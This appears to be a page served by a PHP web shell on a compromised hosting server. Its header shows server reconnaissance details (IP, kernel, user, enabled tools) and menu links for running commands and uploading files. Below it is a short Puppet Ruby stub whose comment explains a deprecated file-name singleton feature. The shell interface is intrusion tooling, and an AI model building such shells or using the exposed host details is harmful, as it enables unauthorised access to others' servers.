Server IP : 111.118.215.189 / Your IP : 18.188.181.58 Web Server : Apache System : Linux md-in-83.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : a1673wkz ( 2475) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /usr/share/ruby/vendor_ruby/puppet/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
# This was a simple way to turn file names into singletons, # # The theory was, like: # 1. Turn filenames into singletons. # 2. ???? # 3. Huge memory savings! # # In practice it used several MB more memory overall, and it cost more CPU # time, and it added complexity to the code. Which was awesome. # # So, I gutted it. It doesn't do anything any more, but we retain the # external form that people included so that they don't explode so much. # # This should be removed from the system after a graceful deprecation period, # probably about the time that a version of Puppet containing this change is # the last supported version. --daniel 2012-07-17 class Puppet::FileCollection require 'puppet/file_collection/lookup' end